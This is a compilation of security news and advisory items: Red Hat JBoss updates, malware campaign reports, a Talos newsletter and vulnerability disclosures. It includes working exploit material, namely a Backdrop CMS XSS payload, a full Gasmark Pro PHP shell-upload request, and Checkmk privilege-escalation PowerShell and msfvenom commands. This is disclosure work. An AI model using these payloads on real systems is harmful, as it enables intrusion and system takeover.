Red Hat Security Advisory 2024-1325-03 - Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling, denial of service, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1325.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 6.0.1 release and security updateAdvisory ID:        RHSA-2024:1325-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1325Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 6.0.1 serves as a replacement for Red Hat JBoss Web Server 6.0.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=6.0https://bugzilla.redhat.com/show_bug.cgi?id=2235370https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1325-03

Red Hat Security Advisory 2024-1319-03 - Red Hat JBoss Web Server 5.7.8 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1319.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 5.7.8 release and security updateAdvisory ID:        RHSA-2024:1319-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1319Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 5.7.8 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.8 serves as a replacement for Red Hat JBoss Web Server 5.7.7. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=5.7https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1319-03

Backdrop CMS version 1.23.0 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field# Date: 2023-08-21# Exploit Author: Sinem Şahin# Vendor Homepage: https://backdropcms.org/# Version: 1.23.0# Tested on: Windows & XAMPP==> Tutorial <==1- Go to the following url. => http://(HOST)/backdrop/node/add/post2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.3- Press "Save" button.XSS Payload ==> "<script>alert("post_body")</script>

Backdrop CMS 1.23.0 Cross Site Scripting

A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information.
Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky.
"The malware payloads used in the DEEP#GOSU represent a

New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics

Gasmark Pro version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: GASMARK PRO-1.0 File Upload RCE## Author: nu11secur1ty## Date: 03/17/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/## Description:Vulnerable input:`<input type="file" class="form-control" id="productImage"name="productImage" style="width:auto;">`This application suffers from shell upload and remote code executionvulnerability, the attacker easilycan destroy this system, when he has credentials.STATUS: HIGH- Vulnerability CRITICAL[+]Exploit:```PHPPOST /gasmark/gasmark/php_action/createclient.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=1afinf22p9snl2nai24g29duucContent-Length: 1063Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/gasmark/gasmark/add_client.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="currnt_date"------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="name"pwned------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="gender"Female------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="mob_no"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="reffering"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="address"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"Content-Type: application/octet-stream<?php// by nu11secur1ty - 2023$fh = fopen('test.html', 'a');fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');fclose($fh);//nlink('test.html');?>------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="create"------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)## Time spent:00:25:00

Gasmark Pro 1.0 Shell Upload

A list of topics we covered in the week of March 11 to March 17 of 2024

March 13, 2024 - Malwarebytes Premium for Windows detected and blocked 100% of the malware samples used in AVLab's January evaluation.

March 13, 2024 - Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

March 13, 2024 - A hoax telling people to copy and paste a copyright notice on Facebook has been making the rounds since 2012. Can we make it go away? Please!

March 12, 2024 - February 2024 is likely to be remembered as one of the most turbulent months in ransomware history.

March 11, 2024 - Information newly made available under California law has shed light on data broker practices, including exactly what categories of information they trade in.

 A week in security (March 11 &#8211; March 17) 

By Waqas
Another day, another cybersecurity threat hits unsuspected users!
This is a post from HackRead.com Read the original post: New Malware “BunnyLoader 3.0” Steals Credentials and Crypto

New high-performance malware “BunnyLoader 3.0” steals logins, crypto & lurks undetected. Palo Alto Unit 42 reveals its tricks to help businesses & individuals fight back. Learn how to protect yourself from this evolving cyber threat.

In the scenario where cybersecurity threats are peeking, staying one step ahead of malicious actors is crucial to protecting your online business and identity. Recently, Palo Alto’s Unit 42 released a report shedding light on a dangerous new malware called BunnyLoader, and its latest version, BunnyLoader 3.0. Here’s what you need to know:

****The BunnyLoader Menace:****

BunnyLoader is not your average malware. It’s a sophisticated tool developed by cybercriminals to steal sensitive information, credentials, and even cryptocurrency from unsuspecting victims. What’s more, it’s constantly evolving, making it a challenging threat for the cybersecurity community.

****A Constantly Evolving Threat:****

Since its discovery in September 2023 on **Breach Forums**, BunnyLoader has undergone multiple updates and enhancements, each aimed at outsmarting security measures and staying under the radar of cybersecurity researchers. From bug fixes to advanced keylogging capabilities, the creators of BunnyLoader are constantly tweaking their creation to maximize its effectiveness.

****The Release of BunnyLoader 3.0:****

On February 11, 2024, the threat actors behind BunnyLoader unveiled their latest version, BunnyLoader 3.0, boasting a 90% improvement in performance. This new iteration comes with a reduced payload size and enhanced keylogging capabilities, making it even more dangerous than before.

****Behind the Scenes of BunnyLoader:****

Unit 42’s **technical write-up** provides a glimpse into the inner workings of BunnyLoader, revealing the tactics and techniques used by its creators to evade detection. From changing file names to mimicking legitimate applications, BunnyLoader employs various strategies to stay hidden from cybersecurity experts.

****Protecting Yourself Against BunnyLoader:****

With the threat of BunnyLoader looming large, it’s more important than ever to stay vigilant and take proactive measures to protect yourself and your online assets. By staying informed about the latest cyber threats and implementing robust security measures, you can minimize the risk of **falling victim to malicious actors**.

1.  95.6% of New Malware in 2022 Targeted Windows
2.  SpyNote Android Spyware Poses as Legit Crypto Wallets
3.  Malware Turns Windows, macOS Devices into Proxy Nodes
4.  Mispadu Stealer’s New Variant Targets Browser Data of Mexicans
5.  Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

New Malware “BunnyLoader 3.0” Steals Credentials and Crypto

There are a few reasons why we’re so ready to jump to the “it’s a cyber attack!”

Thursday, March 14, 2024 14:00

Some of my Webex rooms recently have been blowing up with memes about blaming Canada or wild speculation that a state-sponsored actor is carrying out some sort of major campaign.  

After a widespread outage of cellular service with AT&T and other carriers a few weeks ago, people were sure it was some sort of coordinated attack to disrupt Americans’ services that largely power our day-to-day lives. The outage lasted about 11 hours, and after the fact, the company announced they’d give customers a whopping $5 credit to make up for the issue. The Federal Communications Commission also announced last week that it was launching a formal investigation into the outage, requesting more information about the exact cause and how many users were affected.  

About two weeks later, the same kinds of messages and questions to our team came flooding in when Meta experienced an outage across many of its platforms, most notably Facebook, Instagram and Threads. Though this only lasted a few hours, any time Americans can’t access their Instagram feeds, it’s going to make headlines. 

In both cases, consumers immediately wanted to start pointing fingers — Which actor was behind these? Why is there so little information about this outage? Is this China getting revenge for talk of forcing a TikTok sale? What’s the broader conspiracy behind this? The outages also quickly opened the door for some of the world’s chief spreaders of misinformation and fake news to start spreading conspiracy theories. 

The problem is, not every technical issue can or needs to be explained away by a cyber attack. That’s not to undersell the danger that state-sponsored APTs pose currently, or the fact that they \*could\* one day cause a disruption like this. But jumping to that conclusion every time Down Detector pops off is only going to spread fear/FUD and help these outlets for disinformation reach a larger audience.  

It creates a “boy who cried wolf” situation for when a major cyber attack actually does happen, and the average consumer is forced to make an immediate update to some piece of software or hardware. 

There are a few reasons why we’re so ready to jump to the “it’s a cyber attack!” conclusion. One is that Hollywood has been “glamorizing” the idea of a major cyber attack or major disruption for years now. Movies and TV shows like Netflix’s “Leave the World Behind” have dramatized what a major cyber attack or internet outage may look like, and how quickly it could lead to the unraveling of civilization. Because of our current doomscrolling culture, the second something even looks like it could be a cyber event, we’re ready to declare the end of our economy and society. 

It’s also sexier when it’s a cyber attack. AT&T says its outage was caused by a technical error that occurred when it was trying to upgrade its network’s capacity, explicitly stating it was not caused by any sort of disruption campaign or cyber attack. Meta simply chalked their outage up to a “technical issue.”  

None of these things make for good headlines. But sometimes, the simplest explanation is the most obvious one — we’ve all pressed a wrong button here or there, and stuff breaks on the internet all the time for all sorts of reasons. But “Users logged out of Instagram after Meta employee hits ‘enter’ too soon” isn’t as eye-catching as “Are Instagram and Facebook down because of a cyber attack?” 

Could these multi-billion-dollar corporations be lying? Sure, but I also find it hard enough to believe that the truth would not have made it out to consumers by now if these outages weren’t simple technical issues, nor would AT&T feel compelled to reimburse customers for something that could be totally out of their control. 

And if you ever get logged out of Facebook or Instagram, maybe you’re just better off being offline for a few hours anyway than immediately assuming Mahershala Ali is going to be knocking on your vacation home’s door in any minute.   

**The one big thing **

We want to keep reminding users to update and upgrade their network infrastructure. Aging devices like switches and routers that are used across the globe are a consistently vulnerable surface for adversaries to gain an initial foothold onto targeted networks. Talos recently highlighted the three most common post-compromise attacks that adversaries carry out after compromising these types of vulnerable devices, including modifying the device’s firmware and downgrading the firmware to remove older patches and open the door to new exploitable vulnerabilities. Nick Biasini from Talos Outreach also spoke about this issue for an article in NetworkWorld.  

**Why do I care? **

As Hazel Burton puts it in the blog post linked above: “Adversaries, particularly APTs, are capitalizing on this scenario to conduct hidden post-compromise activities once they have gained initial access to the network. The goal here is to give themselves a greater foothold, conceal their activities, and hunt for data and intelligence that can assist them with their espionage and/or disruptive goals. Think of it like a burglar breaking into a house via the water pipes. They’re not using “traditional” methods such as breaking down doors or windows (the noisy smash-and-grab approach) — they’re using an unusual route, because no one ever thinks their house will be broken into via the water pipes. Their goal is to remain stealthy on the inside while they take their time to find the most valuable artefacts.” 

**So now what? **

If you are using network infrastructure that is end of life, out of support, and now has vulnerabilities that cannot be patched, now really is the time to replace those devices. Using networking equipment that has been built with secure-by-design principles such as running secure boot, alongside having a robust configuration and patch management approach, is key to combatting these types of threats. Ensure that these devices are being watched very carefully for any configuration changes and patch them promptly whenever new vulnerabilities are discovered.   

**Top security headlines of the week **

**Security researchers have found a new vulnerability affecting chips made by nearly all major CPU makers dubbed “GhostRace.”** The vulnerability, identified as CVE-2024-2193, requires an adversary to win a race condition and to have physical or privileged access to the targeted machine. However, it could allow a malicious user to steal potentially sensitive information from memory like passwords and encryption keys. "The vulnerability affects many CPU architectures, including those made by Intel, AMD, Arm and IBM. It also affected some hypervisor vendors and the Linux operating system. AMD released an advisory this week that informed customers that they should follow previous defense guidance for other security flaws like Spectre that have affected CPUs in the past. “Our analysis shows all the other common write-side synchronization primitives in the Linux kernel are ultimately implemented through a conditional branch and are therefore vulnerable to speculative race conditions,” VU Amsterdam said in its blog post disclosing GhostRace. (SecurityWeek, Vrije Universiteit Amsterdam) 

**Health care providers are still reeling from a cyber attack on Change Healthcare**, a subsidiary of the United HealthGroup Inc. insurance provider. First Health Advisory, a digital health risk assurance firm, recently estimated that health care providers are losing an estimated $100 million daily as they still cannot process payments from insurance providers. Change first disclosed the suspected ransomware attack in late February, and on March 5, the U.S. government announced a plan to provide relief payments for providers who are facing financial shortfalls due to the outage. Many doctors' offices and care clinics are facing late rent payments and unpaid invoices. The attack has also limited some patients’ ability to obtain pre-authorization for certain services and surgeries, and others have not been able to refill their prescriptions at hospitals. U.S. Congress is also asking the CEO of United HealthGroup to appear before a committee to answer questions about the hack. (CBS News, Bloomberg) 

**The U.S. has placed formal sanctions against two individuals and five entities associated with the Intellexa Consortium,** responsible for developing and distributing the Predator spyware. Talos has previously reported on Intellexa’s tools, and how their spyware is silently loaded onto targeted devices. This is the first time the Treasury Department has sanctioned a spyware organization and announced it publicly. The sanctions include five vendors who work with Intellexa to sell the spyware, all of whom are spread across Europe. Intellexa itself is based in Greece. Predator and other spyware developed by private parties are often used to target high-risk individuals to track their communication and movement, including politicians, journalists, activists and political dissidents. Under the sanctions, anyone in the U.S. is forbidden from doing business with Intellexa or the associated companies and individuals. The Biden administration has long pushed for additional action against spyware makers, including Israel-based NSO Group, which distributes the Pegasus spyware. (Voice of America, Axios) 

**Can’t get enough Talos? **

*   Threat actors leverage document publishing sites for ongoing credential and session token theft 
*   Heather Couk is here to keep your spirits up during a cyber emergency, even if it takes the “Rocky” music 
*   Another Patch Tuesday with no zero-days, only two critical vulnerabilities disclosed by Microsoft 
*   Talos Takes Ep. #175: What's new about GhostSec's ransomware-as-a-service model 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_   

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe   
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a   
**Typical Filename:** nYzVlQyRnQmDcXk   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd 

**SHA 256:** e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3   
**MD5:** c16df0bfc6fda86dbfa8948a566d32c1   
**Typical Filename:** CEPlus.docm   
**Claimed Product:** N/A    
**Detection Name:** Doc.Downloader.Pwshell::mash.sr.sbx.vioc 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934   
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c   
**Typical Filename:** Wextract   
**Claimed Product:** Internet Explorer   
**Detection Name:** W32.File.MalParent

Not everything has to be a massive, global cyber attack

By Waqas
Microsoft's Copilot for Security will be accessible through a pay-as-you-use licensing model.
This is a post from HackRead.com Read the original post: Microsoft is Opening AI-Powered “Copilot for Security” to Public

Microsoft’s innovative security solution, Copilot for Security, will be available to the public from April 1, 2024, marking a significant advancement in the fight against cybercrime.

Microsoft Copilot for Security, initially accessible to select users through an exclusive early access initiative, is an innovative AI-driven tool aimed at fortifying defenders’ capabilities and efficiency in tackling security challenges. The feature is now becoming available to the public, enabling everyone to leverage its benefits.

****What is Microsoft Copilot?****

Copilot is an industry-first **generative AI** solution designed to empower security and IT professionals. It leverages the power of artificial intelligence to analyze vast amounts of data and provide crucial insights, allowing security teams to:

*   **Catch hidden threats:** Copilot’s AI capabilities can uncover subtle anomalies that human analysts might miss, bolstering overall threat detection.
*   **Respond faster:** By automating routine tasks and offering real-time guidance, Copilot streamlines security operations, enabling a quicker response to security incidents.
*   **Boost expertise:** The AI assistant serves as a valuable learning tool, helping security professionals stay up-to-date on the latest threats and best practices.

****Microsoft Copilot for Security: Tailored for the Modern Defender****

This specific feature of Copilot focuses on the unique needs of cybersecurity professionals. It integrates seamlessly with existing security workflows, offering features such as:

*   **Natural language interaction:** Security personnel can interact with Copilot using plain English, asking questions and receiving clear, actionable responses.
*   **Enhanced incident response:** Copilot assists in investigations by analyzing data, suggesting potential causes, and recommending next steps.
*   **Proactive threat hunting:** The AI proactively scans for vulnerabilities and suspicious activity, helping to identify potential threats before they escalate.
*   **Improved posture management:** Copilot continuously monitors an organization’s security posture, providing valuable insights for strengthening defences.

> _“Threat actors are getting more sophisticated. Things happen fast, so we need to be able to respond fast. With the help of Copilot for Security, we can start focusing on automated responses instead of manual responses. It’s a huge gamechanger for us.”_
> 
> Mario Ferket, Chief Information Security Officer, Dow Inc.

****General Availability and Beyond****

Microsoft **announced** the general availability of Copilot for Security on April 1, 2024. This means the solution is now accessible for purchase by any organization seeking to strengthen its cybersecurity efforts.

The future of Copilot appears bright, with Microsoft continuously developing new capabilities. The company emphasizes its commitment to working with security professionals to further refine the solution and ensure it remains a valuable asset in the growing cyber threat landscape.

1.  Microsoft’s new tool detects, reports pedophiles in chats
2.  Kali Linux 2023.4 is Out: Cloud ARM64, Hyper-V, Pi 5, & More!
3.  Microsoft’s Windows File Recovery tool recovers your lost data
4.  Microsoft launches Linux memory forensics tool to detect malware
5.  McAfee’s Mockingbird AI Tool Detects Deepfake with 90% accuracy

Microsoft is Opening AI-Powered “Copilot for Security” to Public

Checkmk Agent versions 2.0.0, 2.1.0, and 2.2.0 suffer from a local privilege escalation vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20240307-0 >  
=======================================================================  
               title: Local Privilege Escalation via writable files  
             product: Checkmk Agent  
  vulnerable version: 2.0.0, 2.1.0, 2.2.0  
       fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1  
          CVE number: CVE-2024-0670  
              impact: high  
            homepage: https://checkmk.com  
               found: 2023-12-01  
                  by: Michael Baer (Office Fürth)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Checkmk 2.2 has arrived – and is ready to monitor your hybrid IT  
infrastructure with new features for monitoring native cloud applications,  
OpenShift support, an expanded REST API, UX improvements, enhanced  
integrations and over 174 new or reworked checks and agents. Monitor your  
cloud assets from top hyperscalers with Checkmk 2.2 in addition to the  
powerful monitoring of your on-premises networks and servers."

Source: https://checkmk.com/product/latest-version

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via writable files (CVE-2024-0670)  
In some cases, the software creates temporary files inside the directory  
C:\Windows\Temp that get executed afterwards. An attacker can leverage this  
to place write-protected malicious files in the directory beforehand. The files  
get executed by Checkmk with SYSTEM privileges allowing attackers to escalate  
their privileges.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via writable files (CVE-2024-0670)  
In the first step, the filename that will be used by Checkmk needs to be found.  
The application creates temporary files with name cmk_{}_{}_{}.cmd. The  
placeholders are replaced with a string, the process id and a counter. The first  
string was always 'all' and the counter usually is 0. The process id is not  
exactly predictable. However, Windows assigns those numbers in increasing order.  
This allows to observe the currently used process ids and define a limited  
range of probable ids.

In the second step, the attacker places the malicious binary into the folder  
C:\Windows\Temp multiple times. The filenames are constructed using the above  
pattern for all different probable ids. After placing the files, the attacker  
marks them as read-only. Both can be automated using the following powershell  
command. Here, the range of probable ids was determined to be between 10000  
and 30000. The file C:\Users\attacker\Desktop\mal.exe is the malicious file.

10000..30000 | foreach {  
  copy C:\Users\attacker\Desktop\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;  
  Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;  
}

For this proof of concept, a binary was created using msfvenom that executes  
the command whoami and writes the result to a file. This will allow to verify  
the successful execution as the SYSTEM user. The following command was used:

msfvenom -p windows/exec CMD='cmd /c "whoami > C:\abc\file"' -f exe -o mal.exe

It should be noted, that the folder C:\abc has to exist and that the anti-virus  
solution must be disabled to execute this particular binary.

The final step is to force Checkmk to write and execute those temporary files.

It was observed that repairing the software is enough. This repair process can  
be initiated via the Windows GUI or using the following command. The name  
fafda3e.msi will be different on every system. The folder C:\Windows\Installer  
can be investigated to find the correct name on a given system.

msiexec /fa C:\Windows\Installer\fafda3e.msi

After the repairing finished, the file written by the malicious binary can be  
checked. It was created and contains the string "nt authority\system".  
[see figure checkmk_tempfolder.png]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 2.1.0

According to the vendor, the following versions are affected:  
* 2.0.0  
* 2.1.0  
* 2.2.0

Vendor contact timeline:  
------------------------  
2024-01-15: Contacting vendor through security@checkmk.com  
2024-01-18: Vendor confirms vulnerability, assigns CVE, and  
             prepares a fix  
2024-01-26: Providing credits and acknowledging CVSS score.  
2024-03-04: Vendor informs us that fixes with Werk #16361  
             are available.  
2024-03-07: Coordinated release of security advisory.

Solution:  
---------  
Install the latest version 2.1.0p40 or 2.2.0p23 from the vendor's  
download page:

https://checkmk.com/download

More information can be found within the vendor's security advisory:  
https://checkmk.com/werk/16361

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer / @2024

Tag

#windows